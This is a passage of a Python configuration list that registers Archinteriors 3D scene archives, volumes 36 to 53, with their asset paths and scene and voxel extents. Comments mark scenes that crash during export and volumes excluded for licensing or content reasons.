scenes.append({"name": "ai_036_007", "archive_file": "AI36_Scene_007.rar", "asset_file": os.path.join("Scene_007", "AI36_007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_036_008", "archive_file": "AI36_Scene_008.rar", "asset_file": os.path.join("Scene_008", "AI36_008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_036_009", "archive_file": "AI36_Scene_009.rar", "asset_file": os.path.join("Scene_009", "AI36_009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_036_010", "archive_file": "AI36_Scene_010.rar", "asset_file": os.path.join("Scene_010", "AI36_010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_037_001", "archive_file": "AI37_Scene_001.rar", "asset_file": os.path.join("Scene_001", "AI37_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_037_002", "archive_file": "AI37_Scene_002.rar", "asset_file": os.path.join("Scene_002", "AI37_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_037_003", "archive_file": "AI37_Scene_003.rar", "asset_file": os.path.join("Scene_003", "AI37_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_037_004", "archive_file": "AI37_Scene_004.rar", "asset_file": os.path.join("Scene_004", "AI37_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_037_005", "archive_file": "AI37_Scene_005.rar", "asset_file": os.path.join("Scene_005", "AI37_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_037_006", "archive_file": "AI37_Scene_006.rar", "asset_file": os.path.join("Scene_006", "AI37_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_037_007", "archive_file": "AI37_Scene_007.rar", "asset_file": os.path.join("Scene_007", "AI37_007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_037_008", "archive_file": "AI37_Scene_008.rar", "asset_file": os.path.join("Scene_008", "AI37_008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_037_009", "archive_file": "AI37_Scene_009.rar", "asset_file": os.path.join("Scene_009", "AI37_009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_037_010", "archive_file": "AI37_Scene_010.rar", "asset_file": os.path.join("Scene_010", "AI37_010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_038_001", "archive_file": "AI38_Scene_001.rar", "asset_file": os.path.join("Scene_001", "AI38_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_038_002", "archive_file": "AI38_Scene_002.rar", "asset_file": os.path.join("Scene_002", "AI38_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_038_003", "archive_file": "AI38_Scene_003.rar", "asset_file": os.path.join("Scene_003", "AI38_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_038_004", "archive_file": "AI38_Scene_004.rar", "asset_file": os.path.join("Scene_004", "AI38_004"), "normalization_policy": "v0", "scene_extent_meters": 300.0, "voxel_extent_meters": 1.0})
scenes.append({"name": "ai_038_005", "archive_file": "AI38_Scene_005.rar", "asset_file": os.path.join("Scene_005", "AI38_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_038_006", "archive_file": "AI38_Scene_006.rar", "asset_file": os.path.join("Scene_006", "AI38_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_038_007", "archive_file": "AI38_Scene_007.rar", "asset_file": os.path.join("Scene_007", "AI38_007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# crashes during export
# scenes.append({"name": "ai_038_008", "archive_file": "AI38_Scene_008.rar", "asset_file": os.path.join("Scene_008", "AI38_008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_038_009", "archive_file": "AI38_Scene_009.rar", "asset_file": os.path.join("Scene_009", "AI38_009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_038_010", "archive_file": "AI38_Scene_010.rar", "asset_file": os.path.join("Scene_010", "AI_38_010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_039_001", "archive_file": "AI39_Scene_001.rar", "asset_file": os.path.join("Scene_001", "AI39_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_039_002", "archive_file": "AI39_Scene_002.rar", "asset_file": os.path.join("Scene_002", "AI39_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_039_003", "archive_file": "AI39_Scene_003.rar", "asset_file": os.path.join("Scene_003", "AI39_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_039_004", "archive_file": "AI39_Scene_004.rar", "asset_file": os.path.join("Scene_004", "AI39_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_039_005", "archive_file": "AI39_Scene_005.rar", "asset_file": os.path.join("Scene_005", "AI39_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_039_006", "archive_file": "AI39_Scene_006.rar", "asset_file": os.path.join("Scene_006", "AI39_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_039_007", "archive_file": "AI39_Scene_007.rar", "asset_file": os.path.join("Scene_007", "AI39_007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_039_008", "archive_file": "AI39_Scene_008.rar", "asset_file": os.path.join("Scene_008", "AI39_008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_039_009", "archive_file": "AI39_Scene_009.rar", "asset_file": os.path.join("Scene_009", "AI39_009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_039_010", "archive_file": "AI39_Scene_010.rar", "asset_file": os.path.join("Scene_010", "AI39_010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
#
# Archinteriors volumes 40-49
#
# Archinteriors volume 40 is not distributed under the "Royalty Free Licence - All Extended Uses" license, so we exclude it
scenes.append({"name": "ai_041_001", "archive_file": "AI41_Scene_001.rar", "asset_file": os.path.join("Scene_001", "AI41_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_041_002", "archive_file": "AI41_Scene_002.rar", "asset_file": os.path.join("Scene_002", "AI41_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_041_003", "archive_file": "AI41_Scene_003.part1.rar", "asset_file": os.path.join("Scene_003", "AI41_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_041_004", "archive_file": "AI41_Scene_004.rar", "asset_file": os.path.join("Scene_004", "AI41_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_041_005", "archive_file": "AI41_Scene_005.rar", "asset_file": os.path.join("Scene_005", "AI41_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_041_006", "archive_file": "AI41_Scene_006.rar", "asset_file": os.path.join("Scene_006", "AI41_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_041_007", "archive_file": "AI41_Scene_007.rar", "asset_file": os.path.join("Scene_007", "AI41_007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_041_008", "archive_file": "AI41_Scene_008.rar", "asset_file": os.path.join("Scene_008", "AI41_008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_041_009", "archive_file": "AI41_Scene_009.rar", "asset_file": os.path.join("Scene_009", "AI41_009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_041_010", "archive_file": "AI41_Scene_010.part1.rar", "asset_file": os.path.join("Scene_010", "AI41_010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_042_001", "archive_file": "AI42_Scene_001.rar", "asset_file": os.path.join("Scene_001", "AI42_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_042_002", "archive_file": "AI42_Scene_002.rar", "asset_file": os.path.join("Scene_002", "AI42_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_042_003", "archive_file": "AI42_Scene_003.rar", "asset_file": os.path.join("Scene_003", "AI42_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_042_004", "archive_file": "AI42_Scene_004.rar", "asset_file": os.path.join("Scene_004", "AI42_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_042_005", "archive_file": "AI42_Scene_005.rar", "asset_file": os.path.join("Scene_005", "AI42_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# crashes during export
# scenes.append({"name": "ai_043_001", "archive_file": "AI43_001.rar", "asset_file": os.path.join("001", "AI43_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_043_002", "archive_file": "AI43_002.rar", "asset_file": os.path.join("002", "AI43_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_043_003", "archive_file": "AI43_003.rar", "asset_file": os.path.join("003", "AE43_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_043_004", "archive_file": "AI43_004.rar", "asset_file": os.path.join("004", "AI43_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_043_005", "archive_file": "AI43_005.rar", "asset_file": os.path.join("005", "AI43_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_043_006", "archive_file": "AI43_006.rar", "asset_file": os.path.join("006", "AI43_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_043_007", "archive_file": "AI43_007.rar", "asset_file": os.path.join("007", "AI43_007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_043_008", "archive_file": "AI43_008.rar", "asset_file": os.path.join("008", "AI43_008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_043_009", "archive_file": "AI43_009.rar", "asset_file": os.path.join("009", "AI43_009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_043_010", "archive_file": "AI43_010.rar", "asset_file": os.path.join("010", "AI43_010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_044_001", "archive_file": "AI44_Scene_001.rar", "asset_file": os.path.join("Scene_001", "AI44_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_044_002", "archive_file": "AI44_Scene_002.rar", "asset_file": os.path.join("Scene_002", "AI44_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_044_003", "archive_file": "AI44_Scene_003.part1.rar", "asset_file": os.path.join("Scene_003", "AI44_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_044_004", "archive_file": "AI44_Scene_004.rar", "asset_file": os.path.join("Scene_004", "AI44_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_044_005", "archive_file": "AI44_Scene_005.rar", "asset_file": os.path.join("Scene_005", "AI44_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_044_006", "archive_file": "AI44_Scene_006.rar", "asset_file": os.path.join("Scene_006", "AI44_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_044_007", "archive_file": "AI44_Scene_007.rar", "asset_file": os.path.join("Scene_007", "AI44_007"), "normalization_policy": "v0", "scene_extent_meters": 70.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_044_008", "archive_file": "AI44_Scene_008.rar", "asset_file": os.path.join("Scene_008", "AI44_008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_044_009", "archive_file": "AI44_Scene_009.rar", "asset_file": os.path.join("Scene_009", "AI44_009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_044_010", "archive_file": "AI44_Scene_010.rar", "asset_file": os.path.join("Scene_010", "AI44_010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_045_001", "archive_file": "AI45_Scene_001.part1.rar", "asset_file": os.path.join("Scene_001", "AI45_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# crashes during export
# scenes.append({"name": "ai_045_002", "archive_file": "AI45_Scene_002.rar", "asset_file": os.path.join("Scene_002", "AI45_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# crashes during export
# scenes.append({"name": "ai_045_003", "archive_file": "AI45_Scene_003.rar", "asset_file": os.path.join("Scene_003", "AI45_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_045_004", "archive_file": "AI45_Scene_004.part1.rar", "asset_file": os.path.join("Scene_004", "AI45_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_045_005", "archive_file": "AI45_Scene_005.rar", "asset_file": os.path.join("Scene_005", "AI45_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_045_006", "archive_file": "AI45_Scene_006.rar", "asset_file": os.path.join("Scene_006", "AI45_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# crashes during export
# scenes.append({"name": "ai_045_007", "archive_file": "AI45_Scene_007.part1.rar", "asset_file": os.path.join("Scene_007", "AI45_007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_045_008", "archive_file": "AI45_Scene_008.part1.rar", "asset_file": os.path.join("Scene_008", "AI45_008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# crashes during export
# scenes.append({"name": "ai_045_009", "archive_file": "AI45_Scene_009.part1.rar", "asset_file": os.path.join("Scene_009", "AI45_009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_045_010", "archive_file": "AI45_Scene_010.rar", "asset_file": os.path.join("Scene_010", "AI45_010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_046_001", "archive_file": "AI46_Scene_001.rar", "asset_file": os.path.join("001", "AI46_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_046_002", "archive_file": "AI46_Scene_002.rar", "asset_file": os.path.join("002", "AI46_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_046_003", "archive_file": "AI46_Scene_003.rar", "asset_file": os.path.join("003", "AI46_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_046_004", "archive_file": "AI46_Scene_004.rar", "asset_file": os.path.join("004", "AI46_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_046_005", "archive_file": "AI46_Scene_005.rar", "asset_file": os.path.join("005", "AI46_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_046_006", "archive_file": "AI46_Scene_006.rar", "asset_file": os.path.join("006", "AI46_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_046_007", "archive_file": "AI46_Scene_007.rar", "asset_file": os.path.join("007", "AI46_007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_046_008", "archive_file": "AI46_Scene_008.rar", "asset_file": os.path.join("008", "AI46_008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_046_009", "archive_file": "AI46_Scene_009.rar", "asset_file": os.path.join("009", "AI46_009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# crashes during export
# scenes.append({"name": "ai_046_010", "archive_file": "AI46_Scene_010.rar", "asset_file": os.path.join("010", "AI46_010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_047_001", "archive_file": "AI47_001.rar", "asset_file": os.path.join("001", "AI47_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_047_002", "archive_file": "AI47_002.rar", "asset_file": os.path.join("002", "AI47_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_047_003", "archive_file": "AI47_003.rar", "asset_file": os.path.join("003", "AI47_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_047_004", "archive_file": "AI47_004.rar", "asset_file": os.path.join("004", "AI47_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_047_005", "archive_file": "AI47_005.rar", "asset_file": os.path.join("005", "AI47_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_047_006", "archive_file": "AI47_006.rar", "asset_file": os.path.join("006", "AI47_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_047_007", "archive_file": "AI47_007.rar", "asset_file": os.path.join("007", "AI47_007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_047_008", "archive_file": "AI47_008.rar", "asset_file": os.path.join("008", "AI47_008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_047_009", "archive_file": "AI47_009.rar", "asset_file": os.path.join("009", "AI47_009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# crashes during export
# scenes.append({"name": "ai_047_010", "archive_file": "AI47_010.rar", "asset_file": os.path.join("010", "AI47_010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_048_001", "archive_file": "Ai48_001.7z", "asset_file": os.path.join("001", "AI48_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_048_002", "archive_file": "Ai48_002.7z", "asset_file": os.path.join("002", "AI48_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_048_003", "archive_file": "Ai48_003.7z.001", "asset_file": os.path.join("003", "AI48_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_048_004", "archive_file": "Ai48_004.7z", "asset_file": os.path.join("004", "AI48_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_048_005", "archive_file": "Ai48_005.7z", "asset_file": os.path.join("005", "AI48_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_048_006", "archive_file": "Ai48_006.7z.001", "asset_file": os.path.join("006", "AI48_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_048_007", "archive_file": "Ai48_007.7z.001", "asset_file": os.path.join("007", "AI48_007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_048_008", "archive_file": "Ai48_008.7z", "asset_file": os.path.join("008", "AI48_008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_048_009", "archive_file": "Ai48_009.7z", "asset_file": os.path.join("009", "AI48_009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_048_010", "archive_file": "Ai48_010.7z", "asset_file": os.path.join("010", "AI48_010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# Archinteriors volume 49 appears to consist mostly of isolated objects rather than scenes, so we exclude it
#
# Archinteriors volumes 50-59
#
scenes.append({"name": "ai_050_001", "archive_file": "AI50_001.7z", "asset_file": os.path.join("001", "AI50_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_050_002", "archive_file": "AI50_002.7z", "asset_file": os.path.join("002", "AI50_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_050_003", "archive_file": "AI50_003.7z", "asset_file": os.path.join("003", "AI50_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_050_004", "archive_file": "AI50_004.7z", "asset_file": os.path.join("004", "AI50_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_050_005", "archive_file": "AI50_005.7z", "asset_file": os.path.join("005", "AI50_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_051_001", "archive_file": "AI51_001.7z", "asset_file": os.path.join("001", "AI51_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_051_002", "archive_file": "AI51_002.7z", "asset_file": os.path.join("002", "AI51_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_051_003", "archive_file": "AI51_003.7z.001", "asset_file": os.path.join("003", "AI51_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_051_004", "archive_file": "AI51_004.7z.001", "asset_file": os.path.join("004", "AI51_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_051_005", "archive_file": "AI51_005.7z.001", "asset_file": os.path.join("005", "AI51_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_052_001", "archive_file": "AI52_001.7z.001", "asset_file": os.path.join("001", "AI52_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_052_002", "archive_file": "AI52_002.7z.001", "asset_file": os.path.join("002", "AI52_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_052_003", "archive_file": "AI52_003.7z.001", "asset_file": os.path.join("003", "AI52_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_052_004", "archive_file": "AI52_004.7z.001", "asset_file": os.path.join("004", "AI52_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_052_005", "archive_file": "AI52_005.7z.001", "asset_file": os.path.join("005", "AI52_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_052_006", "archive_file": "AI52_006.7z.001", "asset_file": os.path.join("006", "AI52_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_052_007", "archive_file": "AI52_007.7z.001", "asset_file": os.path.join("007", "AI52_007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_052_008", "archive_file": "AI52_008.7z.001", "asset_file": os.path.join("008", "AI52_008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_052_009", "archive_file": "AI52_009.7z.001", "asset_file": os.path.join("009", "AI52_009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_052_010", "archive_file": "AI52_010.7z.001", "asset_file": os.path.join("010", "AI52_010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_053_001", "archive_file": "AI53_001.7z", "asset_file": os.path.join("AI53_001", "AI53_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_053_002", "archive_file": "AI53_002.7z", "asset_file": os.path.join("AI53_002", "AI53_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_053_003", "archive_file": "AI53_003.7z", "asset_file": os.path.join("AI53_003", "AI53_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_053_004", "archive_file": "AI53_004.7z", "asset_file": os.path.join("AI53_004", "AI53_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_053_005", "archive_file": "AI53_005.7z", "asset_file": os.path.join("AI53_005", "AI53_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_053_006", "archive_file": "AI53_006.7z", "asset_file": os.path.join("AI53_006", "AI53_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_053_007", "archive_file": "AI53_007.7z", "asset_file": os.path.join("AI53_007", "AI53_007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_053_008", "archive_file": "AI53_008.7z", "asset_file": os.path.join("AI53_008", "AI53_008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_053_009", "archive_file": "AI53_009.7z", "asset_file": os.path.join("AI53_009", "AI53_009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_053_010", "archive_file": "AI53_010.7z", "asset_file": os.path.join("AI53_010", "AI53_010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_053_011", "archive_file": "AI53_011.7z", "asset_file": os.path.join("AI53_011", "AI53_011"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_053_012", "archive_file": "AI53_012.7z", "asset_file": os.path.join("AI53_012", "AI53_012"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_053_013", "archive_file": "AI53_013.7z", "asset_file": os.path.join("AI53_013", "AI53_013"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
